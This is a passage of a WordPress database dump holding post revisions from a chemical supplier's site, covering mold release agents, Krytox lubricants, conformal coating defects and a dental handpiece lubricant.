should not be used to mold any silicone or fluorosilicone based products.  Application can be performed via aerosolization or brushing/wiping and formulations come as either solvent or water-based.  ReleaSys is Miller-Stephenson\'s most cost-effective, highest performing release agent capable of dramatically reduced re-application frequency, greater product throughput, and lower rejection rates.\r\n\r\nMiller-Stephenson mold release agents are backed by over 40 years of research and development and are relied upon by global industries to ensure efficient, cost effective, and high quality release of their molded parts. By pioneering release agent solutions for many of the largest manufacturing organizations, Miller-Stephenson understands what it takes to release the most complex materials in the most demanding molding applications. We have solutions which are optimized for your molding operations; from airplane stow bins to O-rings, carbon-fiber bike frames to tires, Miller-Stephenson has a solution for your molding operation.\r\n\r\n[ux_product_categories ids="21,16" number="10"]\r\n\r\nTo learn more about our mold release agents please <strong><a href="https://www.miller-stephenson.com/chemicals/release-agents/">click here.</a></strong>\r\n<h3>Technical or Application Support:</h3>\r\n<ul>\r\n 	<li><strong><a href="https://www.miller-stephenson.com/troubleshooting-common-mold-release-issues/">For any questions about proper application of our mold release products please view our article which discusses this process</a></strong></li>\r\n 	<li><strong><a href="https://www.miller-stephenson.com/tech-support/">If you require any further technical or application support please contact our technical staff</a></strong></li>\r\n</ul>', 'Mold Release Agents: Which is right for you?', '', 'inherit', 'closed', 'closed', '', '1525-revision-v1', '', '', '2016-11-22 14:54:01', '2016-11-22 14:54:01', '', 1525, 'https://www.miller-stephenson.com/1525-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (3087, 2, '2016-11-22 14:57:46', '2016-11-22 14:57:46', '<h3>Mold Release Agents: Which is right for you?</h3>\r\nMold release agents provide the critical barrier between a molding surface and the substrate, facilitating separation of the cured part from the mold. Without such a barrier in place the substrate would become fused to the mold surface, resulting in difficult clean-up and dramatic loss in production efficiency. Even when a mold release agent is used, factors such as irregular applications or improper release agent choice will have a dramatic effect on the quality and consistency of your finished product. It is therefore critical that  engineers understand what types of mold release agents are available and which variant would compliment their production method.  There are several distinct release agents categories: Sacrificial, PVA (polyvinyl alcohol), PTFE (polytetrafluoroethylene), and Thermoset polysiloxanes.  Critical criteria for each release agent to meet is the following:\r\n<ul>\r\n 	<li>Surface adhesion and durability</li>\r\n 	<li>Ability to form a thin-film</li>\r\n 	<li>Sufficient surface slip</li>\r\n 	<li>Chemical inertness to the molding process and molding substrate</li>\r\n 	<li>Number of releases per application</li>\r\n</ul>\r\nRelease agents types and individual products within those types, vary significantly in regard to slip, application methods, production efficiency and cost. For that reason,  manufacturers who invest time researching and testing release agents will see a return on that investment once an optimized agent is found.  Sacrificial (typically waxes and silicone oils) and PVA release agents are the lowest cost materials, offering adequate slip and chemical inertness.  Unfortunately these agents must be re-applied after each molding cycle, and will transfer to the molding part.  This result in time-consuming cleaning of the molded part.  Interestingly, while the initial cost may be lower for the sacrificial and PVA release agents, the overall cost is substantially more as one can expect  more releases per application and little to no post-operation cleaning with PTFE and thermosett resins.\r\n\r\nMiller-Stephenson specializes in providing only the highest performing and cost-effective mold release solutions for it customers, hence our companies specializes in providing PTFE and thermosetting polysiloxane release agent agents.  In an effort to help guide process engineers in selecting which agent would work best for their molding application we have summarized the leading attributes for each of our agents.\r\n\r\n<a href="https://www.miller-stephenson.com/chemicals/release-agents/ptfe-release-agent/"><strong>PTFE Release Agents</strong></a>\r\n\r\n[caption id="attachment_1559" align="alignleft" width="256"]<img class="wp-image-1559" src="https://www.miller-stephenson.com/wp-content/uploads/2016/09/PTFE-mold-release-800x678.jpg" alt="ptfe-mold-release" width="256" height="216" /> Intricate molding die, an ideal application of the Miller-Stephenson\'s <strong><a href="https://www.miller-stephenson.com/product/ptfe-release-agent/">MS-122AV</a></strong>[/caption]\r\n\r\nMiller-Stephenson\'s PTFE mold release agents(MS-122 and MS-143) utilize low-molecular weight and particle size fluoropolymers to achieve ultra-uniform thin films that exhibit excellent surface adhesion and durability. PTFE-release agents contain no silicones, surfactants, or waxes and are thermally stable up to 600F.  These release agents generate a dry film on the mold surface, which is chemical inert, non-migrating and non-staining.  Formulations for this class of mold release agent can be solvent or water-based and application is typically performed with brushing, hand wiping, or aerosolization. Once the solvent is dried, the release coating is ready for operation, no additional cure time is needed. PTFE dry film release agents are particularly useful in rubber-to-metal bonding operations or when molding silicone or fluorosilicone polymers and elastomers. PTFE has exceptional utility and can be use in compression and transfer molding operations, however due to its relatively low slip, it can be ineffective with injection molding operations.  Production engineers will typically choose PTFE-based release agents if they are looking for a non-silicone, chemical inert, and non-transferable release agent that is applicable across a broad range of substrates. PTFE release agents are particular effective in potting and casting molding operations, specifically with electronic potting and casting as PTFE\'s chemical inertness and low-transfer will not interfere with sensitive electronics. PTFE, on a release per application basis is significantly more efficient and cost-effective than sacrificial or PVA alternatives.  Miller-Stephenson\'s <strong><a href="https://www.miller-stephenson.com/chemicals/release-agents/ptfe-release-agents/">MS-122AV and MS-122SE</a></strong> are formulations which increase the durability and cost-effectiveness even further by addition of proprietary surface activation chemistry.\r\n\r\n<a href="https://www.miller-stephenson.com/chemicals/release-agents/semi-permanent-release-agents/"><strong>Thermoset polysiloxanes</strong></a>\r\n\r\n[caption id="attachment_1561" align="alignleft" width="272"]<img class="wp-image-1561" src="https://www.miller-stephenson.com/wp-content/uploads/2016/09/ReleaSys-polysiloxane-800x530.jpg" alt="releasys-polysiloxane" width="272" height="180" /> <strong><a href="https://www.miller-stephenson.com/chemicals/mold-release-agents/semi-permanent-release-agents/">ReleaSys</a></strong> excels are molding of large composite structures, yielding efficient release cycle after cycle.[/caption]\r\n\r\nThermoset polysiloxanes are the newest generation of mold release agents, designed to crosslink and bind to the mold surface.  These semi-permanent mold release agents generate robust thin-films onto the mold surface, enabling numerous molding cycles to be completed with a single application.  Typically, thermosets require a cure-time to allow sufficient crosslinking and surface adhesion. Cured films are extremely durable, chemically-resistant, have high surface slip, and have temperature stability up to 410F.  Properly applied as a thin film, the release agent will not transfer to parts and therefore will not interfere with secondary adhesive bonds or coating operations.  Over application, however, may result in transfer, so Miller-Stephenson generally recommends training in the product\'s use by one of our technical staff.   Semi-permanents polysiloxanes can be designed to exhibit varying levels of slip, durability, and cure times.  Miller-Stephenson\'s new <strong><a href="https://www.miller-stephenson.com/chemicals/release-agents/semi-permanent-release-agents/">ReleaSys product</a></strong> line offers the most advanced semi-permanent thermoset mold release agents available.  ReleaSys excels in compression, transfer, and injection molding and is compatible with a broad range of resins and elastomers. Our formulations are particularly useful in geometrically complex molds or when using abrasive molding substrates.  ReleaSys should not be used to mold any silicone or fluorosilicone based products.  Application can be performed via aerosolization or brushing/wiping and formulations come as either solvent or water-based.  ReleaSys is Miller-Stephenson\'s most cost-effective, highest performing release agent capable of dramatically reduced re-application frequency, greater product throughput, and lower rejection rates.\r\n\r\nMiller-Stephenson mold release agents are backed by over 40 years of research and development and are relied upon by global industries to ensure efficient, cost effective, and high quality release of their molded parts. By pioneering release agent solutions for many of the largest manufacturing organizations, Miller-Stephenson understands what it takes to release the most complex materials in the most demanding molding applications. We have solutions which are optimized for your molding operations; from airplane stow bins to O-rings, carbon-fiber bike frames to tires, Miller-Stephenson has a solution for your molding operation.\r\n\r\n[ux_product_categories ids="21,16" number="10"]\r\n\r\nTo learn more about our mold release agents please <strong><a href="https://www.miller-stephenson.com/chemicals/release-agents/">click here.</a></strong>\r\n<h3>Technical or Application Support:</h3>\r\n<ul>\r\n 	<li><strong><a href="https://www.miller-stephenson.com/troubleshooting-common-mold-release-issues/">For any questions about proper application of our mold release products please view our article which discusses this process</a></strong></li>\r\n 	<li><strong><a href="https://www.miller-stephenson.com/tech-support/">If you require any further technical or application support please contact our technical staff</a></strong></li>\r\n 	<li><strong><a href="https://en.wikipedia.org/wiki/Release_agent">Understanding Release Agents</a></strong></li>\r\n</ul>', 'Mold Release Agents: Which is right for you?', '', 'inherit', 'closed', 'closed', '', '1525-revision-v1', '', '', '2016-11-22 14:57:46', '2016-11-22 14:57:46', '', 1525, 'https://www.miller-stephenson.com/1525-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (3088, 2, '2016-11-22 15:02:22', '2016-11-22 15:02:22', '<h3>Krytox High-Performance Greases &amp; Oils Application Overview</h3>\r\nDiscovered in 1959, the polymer that would become known worldwide as Krytox showed remarkable thermal and oxidative stability. Potential uses envisioned then included lubricant for the MACH 3+ turbine engine, hydraulic oil, rocket gear box lubricant, and even gyroscope oil.\r\n\r\nIn 1963, Krytox oil was used in a GE engine test for the supersonic transport aircraft. In 1964, new perfluoropolyether (PFPE)-based grease formulations were developed jointly with the U.S. Navy and Air Force, resulting in military specification MIL-G-27617, which was developed specifically for Krytox. The first commercial sales of Krytox were for nonflammable lubricants for the Apollo space program in 1965.\r\n\r\nPrior to 1981, the only commercially available Krytox lubricants were aerospace oil and greases. Since then, PFPE-based oils and greases have been adopted across a very wide range of industries and applications. There are PFPE oils and greases for industrial operations, vacuum pump fluids, incidental food contact, automotive uses, reactive gas, and, of course, military applications—to name just a few.\r\n\r\nToday, of course, it’s our well-known trademark for high-performance synthetic lubricants used for a variety of applications. The oils are made from only fluorine, carbon, and oxygen—a mixture of compounds collectively known by many names—including PFPE, perfluoroalkylether (PFAE), and perfluoropolyalkylether (PFPAE). These perfluorinated oils and greases deliver high performance, perform at wide temperature ranges, and provide superior quality lubrication under extreme conditions in comparison to hydrocarbon alternatives. And, with a global distribution network and world-class technical service, it is the lubricant of choice for extreme conditions and performance.\r\n\r\nThe use of Chemours unique PTFE thickener provides superior chemical and thermal stability to all Krytox grease product lines. Many greases are also available with additional anti-wear and anti-corrosion additives to further boost performance in critical operations.\r\n\r\nKrytox performance lubricants provide superior performance and extended life as lubricants, sealants, and dielectrics. With exceptional performance and reliability in the toughest conditions—where productivity matters and downtime costs, it can contribute significantly to lowering the cost of doing business.\r\n<table width="1455">\r\n<tbody>\r\n<tr>\r\n<td style="text-align: center;" colspan="3" width="1455"><b>Krytox Performance Lubricants</b></td>\r\n</tr>\r\n<tr>\r\n<td colspan="3"><strong><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-gpl-series/">General Purpose Applications</a></strong></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: left;"><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-gpl-series/">GPL 10X Oil / 20X Grease</a></td>\r\n<td>The GPL 10X oil/20X grease series contains no additives and can be used on components that come in contact with chemicals.</td>\r\n<td>Typical applications include valves or bearings in contact with chemicals, seal barrier fluids, instruments, and oxygen systems.</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: left;"><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-gpl-series/krytox-gpl-greases/krytox-gpl-extreme-pressure/">GPL 21X</a></td>\r\n<td>The GPL 21X series contains molybdenum disulfide for extreme pressure (EP) conditions and should be used for slow speed or heavily loaded applications where there is no danger of the molybdenum disulfide additive reacting with chemicals or causing contamination.</td>\r\n<td>Typical applications include highly loaded gears, CV joints, U-joints, splined shafts, and commercial electrical switches.</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: left;"><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-gpl-series/krytox-gpl-greases/krytox-anticorrosion/">GPL 22X</a></td>\r\n<td>The GPL 22X series contains sodium nitrite corrosion/ anti-wear inhibitor and is ideal for corrosive environments where there is no danger of the sodium nitrite additive reacting with chemicals or causing contamination problems.</td>\r\n<td>Typical applications are automotive bearings, sealed pump bearings, electric motor bearings, and general purpose bearings.</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: left;">GPL 29X</td>\r\n<td>The GPL 29X greases have EP and anti-corrosion additives and have been formulated for high-temperature applications that need both high load carrying capacity and anti-corrosion protection.</td>\r\n<td>Typical applications include low-speed conveyor bearings that are subjected to vibration, moist conditions, or frequent temperature cycling that could allow condensation and rusting to occur.</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: left;"> GPL 2EX</td>\r\n<td>The GPL 2E(X) lubricants are formulated using new anti-rust additives. This grease is similar to the GPL 22X series greases but contains a non-nitrite anticorrosion additive that is the salt of an organic acid. The new additives are effective at low concentration levels, are environmentally friendly, and do not pose any restrictions on long-term recyclability of the grease.</td>\r\n<td>Typical applications are automotive bearings, sealed pump bearings, electric motor bearings, and general purpose bearings.</td>\r\n</tr>\r\n<tr>\r\n<td colspan="3"><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-aerospace/"><strong>Lubricants for Aerospace Applications</strong></a></td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-aerospace/aerospace-aviation-oils/">143</a></td>\r\n<td colspan="2">Krytox 143 series oils are clear, colorless fluorinated synthetic oils that are non-reactive, nonflammable, safe in chemical and oxygen service, and long-lasting.</td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-aerospace/krytox-aerospace-aviation-greases/krytox-240/">240</a></td>\r\n<td colspan="2">Krytox 240 series greases are white, buttery greases with all of the same properties as the 143 series oils that they are made from, but they are in grease form. The 240 AZ, 240 AB, and 240 AC meet MIL-PRF-27617 general specifications. Many of the other 240 series products meet other specifications for individual applications.</td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-aerospace/krytox-aerospace-aviation-greases/krytox-250-series/">250</a></td>\r\n<td colspan="2">Krytox 250 series EP greases are black greases that contain molybdenum disulfide added as an extreme pressure additive for highly loaded gears and bearings.</td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-aerospace/krytox-aerospace-aviation-greases/krytox-283-series/">283</a></td>\r\n<td colspan="2">Krytox 283 series anti-corrosion greases are white greases that contain sodium nitrite. These grades provide rust protection at ambient temperatures, corrosion protection at high temperatures, and anti-wear protection.</td>\r\n</tr>\r\n<tr>\r\n<td colspan="3"><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-xp-oil/"><strong>Lubricants for Extended Performance Applications</strong></a></td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-xp-oil/">XP 1A series oils/XP 2A series greases</a></td>\r\n<td colspan="2">The XP lubricant line offers greases and oils with a soluble additive in the oil. It will not be washed away or left behind with the grease thickener. These new patented additives enhance the performance of PFPE greases and oils, giving them improved performance properties. Bearings run quieter and wear less because there are no solid additives to make noise. Lower wear will extend bearing and component life. The anti-corrosion protection of the additive will reduce rusting and allow longer grease and bearing life. The extreme pressure properties of the additive protect bearings under high loads. These products can be used in any lubrication application.</td>\r\n</tr>\r\n<tr>\r\n<td colspan="3"><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-lvp-vpf/"><strong>Lubricating Fluids for Vacuum Pump Applications</strong></a></td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-lvp-vpf/">Vacuum Pump Fluids</a></td>\r\n<td colspan="2">The Vacuum pump fluids are used in vacuum pumps and systems and are used when controlled vapor pressure, nonflammability and non-reactivity are needed. These products can be regenerated back to original properties and reused.</td>\r\n</tr>\r\n<tr>\r\n<td colspan="3"><strong>L<a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-xht/">ubricants for Extra High-Temperature Applications</a></strong></td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-xht/krytox-xht-grease/krytox-xht-s-series/">XHT- S, SX</a></td>\r\n<td colspan="2">This grease is a special high-temperature grease with low oil evaporation that provides long bearing life and is compatible with all elastomers and plastics. It has excellent lubrication over a broad temperature range, but is designed to work best a temperatures of 200–300 °C (400–572 °F). It is nonflammable, oxygen compatible, and chemically inert.</td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-xht/krytox-xht-grease/krytox-xht-ac/">XHT- AC, ACX</a></td>\r\n<td colspan="2">This grease is a special high-temperature grease with low oil evaporation that provides long bearing life and is compatible with most elastomers and plastics. This grease contains sodium nitrite corrosion/anti-wear inhibitor and is ideal for corrosive environments where there is no danger of the sodium nitrite additive reacting with chemicals or causing contamination problems. It has excellent lubrication over a broad temperature range, but is designed to work best between temperatures of 200–300 °C (400–572 °F). It is nonflammable, oxygen compatible, and chemically inert.</td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-xht/krytox-xht-grease/krytox-xht-bd/">XHT- BD, BDX, BDZ</a></td>\r\n<td colspan="2">This grease is designed for use where the temperatures are in the 300 °C (572 °F) range and higher where there is a danger of melting the standard PTFE thickener. This grease uses a special non-melting high temperature thickener that also provides extreme pressure properties and works as a solid lubricant if the base oil is depleted. The base oil is an extremely viscous oil that provides good viscosity and lower evaporation at high temperatures. The grease is slightly tacky and will coat the surface and stay in place. The oil in the grease can begin to slowly degrade at temperatures above 330 °C (625 °F), and this will occur at an increasing rate as temperatures increase. Re-lubrication could be required at these temperatures to achieve optimum life. Maximum use temperatures for these greases are 360 °C (680 °F) with intermittent spikes to 400 °C (752 °F).</td>\r\n</tr>\r\n<tr>\r\n<td colspan="3"><strong>Krytox Lubricants for Specialty Applications</strong></td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/product/krytox-gpl-246/">GPL 246</a></td>\r\n<td>GPL 206 with copper added, so it will conduct electricity.</td>\r\n<td></td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/product/krytox-gpl-407/">GPL 407</a></td>\r\n<td colspan="2">A silica thickened non-melting thickener for low speed applications in conveyors and other such applications where temperatures might cause PTFE melting.</td>\r\n</tr>\r\n<tr>\r\n<td>GPL 577</td>\r\n<td colspan="2">A grease containing a special EP additive and anti-corrosion additives for use under high loads where corrosion might be a factor</td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/product/krytox-lvp/">LVP</a></td>\r\n<td colspan="2">A special high vacuum grease for applications where outgassing must be avoided. This is used in high vacuum industries and for sealing joints in laboratory applications</td>\r\n</tr>\r\n<tr>\r\n<td>XP 2C5</td>\r\n<td colspan="2">The XP 2C5 grease contains an oil soluble additive that is effective at preventing corrosion and reducing wear. It also contains an extreme pressure additive. Typical applications include those in potentially corrosive atmospheres, where vibration or shock loading may be significant and where an element will spend more time experiencing mixed film or boundary lubrication versus the desired full film or hydrodynamic lubrication.</td>\r\n</tr>\r\n<tr>\r\n<td>XHT EP 298 and EP 299</td>\r\n<td colspan="2">These greases have been formulated for high-temperature applications that need both high load carrying capacity and anti-corrosion protection. Typical applications include conveyor chains that are subjected to moist conditions or frequent temperature cycling that could allow condensation and rusting to occur.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\nRecently we have added the new FPG series to the Krytox line offering. <a href="https://www.miller-stephenson.com/krytox-fpg-028-performance-lubricant/">FPG 028</a> was designed for use in aircraft and supporting equipment. Krytox™ FPG 028 is MIL-PRF-27617 TYPE IV specified and has AFPET/PTPT approval. It is resistant to hydrocarbon fuel, liquid oxygen and a variety of other chemicals. FPG 028 operates well under severe conditions and can be used for bearings and gears, and as a lubricant for O-rings and elastomers. The other FPG product, <a href="https://www.miller-stephenson.com/krytox-fpg-182-performance-lubricant/">the FPG 182</a> was designed for clean rooms, robotics, and electronic manufacturing. FPG 182 can be used for bearings, gears, and as a lubricant for O-rings and elastomers. It offers exceptional resistance to oxygen and chemicals and prevents corrosion.\r\n\r\nTo learn more about food grade applications <a href="https://www.miller-stephenson.com/krytox-h-1-food-grade-lubricants/">click here.</a>\r\n\r\nFor Automotive solutions <a href="https://www.miller-stephenson.com/krytox-automotive-lubricants/">click here.</a>\r\n\r\nKrytox <a href="https://www.miller-stephenson.com/krytox-faq/">FAQ.</a>\r\n\r\n<a href="https://www.miller-stephenson.com/mil-prf-27617-greases/">MIL PRF 27617 Greases</a>\r\n\r\nThese products can also be found on <a href="https://www.grainger.com/product/KRYTOX-Multipurpose-Greases-WP6806244/_/N-1181Z1z0qq26/Ntt-krytox?_=1479826888398&amp;sst=subsetTest&amp;ts_optout=true&amp;s_pp=false&amp;picUrl=//static.grainger.com/rp/s/is/image/Grainger/35RR24_AS02?$smthumb$">Grainger.</a>\r\n\r\n<strong>\r\nTO BROWSE OUR KRYTOX CATALOG, SELECT A CATEGORY BELOW:</strong>\r\n[product_categories number="12" ids="34,35,156,40,37,38,36,165,39,168,160,143" columns="4" title="Lubricants, Greases and Oils"]\r\n\r\nKrytox™ is  a trademark of The Chemours Company FC, LLC.\r\n\r\n&nbsp;', 'Krytox Application Overview', '', 'inherit', 'closed', 'closed', '', '2050-revision-v1', '', '', '2016-11-22 15:02:22', '2016-11-22 15:02:22', '', 2050, 'https://www.miller-stephenson.com/2050-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (3089, 3, '2016-11-28 17:00:46', '0000-00-00 00:00:00', '<h1>Common Conformal Coating Defects and Repairs</h1>\r\nA Conformal coating is a protective chemical coating or polymer film 25-75µm thick (50µm typical) that ‘conforms’ to the circuit board topology. Its purpose is to protect electronic circuits from harsh environments that may contain moisture and or chemical contaminants. By being electrically insulating, it maintains long-term surface insulation resistance (SIR) levels and thus ensures the operational integrity of the assembly. It also provides a barrier to air-borne contaminants from the operating environment, such as salt-spray, thus preventing corrosion. Due to the critical application these coating play, proper application is of the utmost importance.  However from time-to-time issues and coating failures do occur and operators and Quality Manager must know how to spot them and promptly correct.  This article will describe and users identify the 6 most common conformal coating defects, their causes, and how they can be repaired. The 6 most common conformal coating defect are the following:\r\n<ol>\r\n 	<li>Capillary Flow</li>\r\n 	<li>Cracking</li>\r\n 	<li>De-wetting</li>\r\n 	<li>Delamination</li>\r\n 	<li>Pin-holes, Bubbles, Foam</li>\r\n 	<li>Orange Peel</li>\r\n</ol>\r\nEach of the above conformal defects can a substantial effect the ultimate performance and protective barrier potential of the applied coating.  Thankfully most of these defects can be avoided by proper substrate preparation and even, uniform application.\r\n<h2><span style="text-decoration: underline;">1. Capillary Flow</span></h2>\r\nCapillary flow in conformal coating is where the coating pulls or runs away from certain areas of a PCB to more favorable sectors due to a combination of effects. At best, the resulting conformal coating is uneven and patchy; at worst, the substrate is left completely uncoated. Factors that can impact capillary flow of conformal coatings include coatings that are too thin, an over-application of coating, or an attempt to coat a surface that is too cool or that is contaminated, among others. Because of this vulnerability to contaminants, cleaning the surface of the product prior to coating is crucial to achieving the desired end result, as is correctly applying the optimal coating for a given application.\r\n<h3>Factors to Correct / Prevent Capillary Flow:</h3>\r\n<ul>\r\n 	<li>Reducing the conformal coating thickness</li>\r\n 	<li>Sufficiently cleaning the coating of all contaminates with a Precision Cleaning Agent (MS-555 or MS-580N)</li>\r\n 	<li>Apply heat to the board prior to application</li>\r\n</ul>\r\n<h2><span style="text-decoration: underline;">De-wetting</span></h2>\r\nDe-wetting is the tendency of the coating material to wet the surface that it has been applied to evenly. Contamination can prevent a conformal coating solution from evenly adhering, leveling and "wetting" the substrate. In the event of such a problem, areas of the product remain uncoated, exposing the substrate to further contamination and coating failure. Cleanliness is the key to avoiding this conformal coating defect. Contamination can originate from mold release agents, residual surfactant and fluxes from the PCB manufacturing process, cleaning bath contamination, or residual moisture on the board surface.\r\n<h3>Factors to Correct / Prevent De-wetting:</h3>\r\n<ul>\r\n 	<li>Minimization of surface contaminates before assembly; low residue fluxes and pastes</li>\r\n 	<li>Proper cleaning of substrate surface with high purity / low NVR solvents</li>\r\n 	<li>If de-wetting occurs, locally strip area with MS-114 Conformal Coating Stripper and reapply coating</li>\r\n</ul>\r\n<h2><span style="text-decoration: underline;">2. Cracking</span></h2>\r\nCracking in conformal coating is where a smooth surface fractures into sections with the cracks in the coating leaving the area below exposed to potential contaminants. Cracking is often attributed to temperatures that are too high during the curing or drying processes. However, cracking of the conformal coating can also be caused by particularly low temperatures or by the application of a coating that is too thick. Film thickness that is too large causes coefficient of thermal expansion (CTE) mismatches and yields cracking of the conformal coating. Strategies for avoiding this defect include reducing coating thickness to manage the coefficient of thermal expansion and paying strict attention to temperature control.\r\n<h3>Factors to Correct / Prevent Cracking:</h3>\r\n<ul>\r\n 	<li>Reduce initial cure temperature</li>\r\n 	<li>Allow increased drying time at room temperature before exposing to cure temperatures</li>\r\n 	<li>Reduce coating thickness</li>\r\n</ul>\r\n<h2><span style="text-decoration: underline;">3. Delamination</span></h2>\r\nDelamination in conformal coating is where the coating lifts from the surface of the PCB, leaving the area below exposed.', 'Common Conformal Coating Defects and How to Repair Them', '', 'draft', 'closed', 'closed', '', 'conformal-coating-defects-and-repairs', '', '', '2016-11-28 17:00:46', '2016-11-28 17:00:46', '', 0, 'https://www.miller-stephenson.com/?p=3089', 0, 'post', '', 0); 
INSERT INTO `wp_posts` VALUES (3090, 0, '2016-11-22 15:14:56', '2016-11-22 15:14:56', '', '', '', 'publish', 'closed', 'closed', '', '3090', '', '', '2016-11-22 15:14:57', '2016-11-22 15:14:57', '', 0, 'https://www.miller-stephenson.com/nf_sub/3090/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (3091, 2, '2016-11-22 15:15:49', '2016-11-22 15:15:49', '<h1><span style="font-size: 120%;"><strong>Dental Handpiece Lubricant</strong></span></h1>\r\nFew medical applications challenge a bearing lubricant more than high-<wbr />speed dental handpieces.  Rotating at speeds of excess of 500,000 rotations per minute (RPM), these handpieces require advanced lubrication which can not only maintain excellent thin-<wbr />film strength, but also do not degrade under the immense mechanical and thermal stresses which occur within these handpieces turbines. FluoroExtreme is the perfect match for your dental handpiece lubricant.\r\n\r\nPictured above is a head-<wbr />to-<wbr />head evaluation of a popular handpiece lubricant versus Miller-<wbr />Stephenson’s FluoroExtreme™ . The handpieces were cleaned and lubricated, then challenged with 3 hours of continuous use at the recommended operating air pressure / rpm. The handpieces were then disassembled and evaluated for wear and deposit formation. The Industry Standard lubricant suffered from significant breakdown resulting in degradation of the o-<wbr />rings, wore impellers and the lubricant itself, resulting in large deposit formation and a very noticeable increase in audible noise during operation.\r\n\r\nIn contrary, <strong><a href="https://www.miller-stephenson.com/product/dental-handpiece-lubricants/">FluoroExtreme™</a></strong>  developed no deposits, the o-<wbr />rings remained intact, and the impellers exhibited minimal wear.  The handpiece also had no noticeable increase in turbine noise. The data clearly shows that Miller-<wbr />Stephenson’s FluoroExtreme™, delivers substantially improved operation of your dental handpiece. Our lubricant minimizes the unsightly degradation seen with hydrocarbon-<wbr />based lubricants while maintaining quiet and clean operation.  Something both the operator and patient will value.\r\n<h3><strong>Product Description</strong></h3>\r\n<a href="https://www.miller-stephenson.com/product/dental-handpiece-lubricants/">FluoroExtreme™</a> is a fluorinated synthetic lubricant specially designed for dental handpieces. This lubricant offers superior protection, lubricity, and chemical stability versus standard hydrocarbon based dental lubricants. FluoroExtreme™ minimizes mechanical wear in all low and high speed handpieces, allowing devices to run longer and quieter while reducing costly repair intervals.\r\n<p class="Body"><strong><span class="C-13">Benefits and Characteristics</span></strong></p>\r\n\r\n<ul>\r\n 	<li class="Body P-5"><span class="C-8">Minimizes mechanical wear</span></li>\r\n 	<li class="Body P-5"><span class="C-8">Reduction in debris formation; Quieter operation</span></li>\r\n 	<li class="Body P-5"><span class="C-8">Extends service life of critical components</span></li>\r\n 	<li class="Body P-5"><span class="C-8">Non-<wbr />Flammable; Chemical and Thermal stability</span></li>\r\n 	<li class="Body P-5"><span class="C-8">Biocompatible (<a href="https://en.wikipedia.org/wiki/ISO_10993">ISO 10993</a>)</span></li>\r\n</ul>\r\n[ux_product_categories ids="12" number="10"]\r\n\r\n<a href="https://www.miller-stephenson.com/product/fluoroextreme-dental-lubricant/">Click here</a> to find out more about these Dental Handpiece Lubricants.', 'Dental Handpiece Lubricant', '', 'inherit', 'closed', 'closed', '', '1128-revision-v1', '', '', '2016-11-22 15:15:49', '2016-11-22 15:15:49', '', 1128, 'https://www.miller-stephenson.com/1128-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (3092, 2, '2016-11-22 15:17:01', '2016-11-22 15:17:01', '<h3><span style="font-size: 120%;"><strong>Dental Handpiece Lubricant</strong></span></h3>\r\nFew medical applications challenge a bearing lubricant more than high-<wbr />speed dental handpieces.  Rotating at speeds of excess of 500,000 rotations per minute (RPM), these handpieces require advanced lubrication which can not only maintain excellent thin-<wbr />film strength, but also do not degrade under the immense mechanical and thermal stresses which occur within these handpieces turbines. FluoroExtreme is the perfect match for your dental handpiece lubricant.\r\n\r\nPictured above is a head-<wbr />to-<wbr />head evaluation of a popular handpiece lubricant versus Miller-<wbr />Stephenson’s FluoroExtreme™ . The handpieces were cleaned and lubricated, then challenged with 3 hours of continuous use at the recommended operating air pressure / rpm. The handpieces were then disassembled and evaluated for wear and deposit formation. The Industry Standard lubricant suffered from significant breakdown resulting in degradation of the o-<wbr />rings, wore impellers and the lubricant itself, resulting in large deposit formation and a very noticeable increase in audible noise during operation.\r\n\r\nIn contrary, <strong><a href="https://www.miller-stephenson.com/product/dental-handpiece-lubricants/">FluoroExtreme™</a></strong>  developed no deposits, the o-<wbr />rings remained intact, and the impellers exhibited minimal wear.  The handpiece also had no noticeable increase in turbine noise. The data clearly shows that Miller-<wbr />Stephenson’s FluoroExtreme™, delivers substantially improved operation of your dental handpiece. Our lubricant minimizes the unsightly degradation seen with hydrocarbon-<wbr />based lubricants while maintaining quiet and clean operation.  Something both the operator and patient will value.\r\n<h3><strong>Product Description</strong></h3>\r\n<a 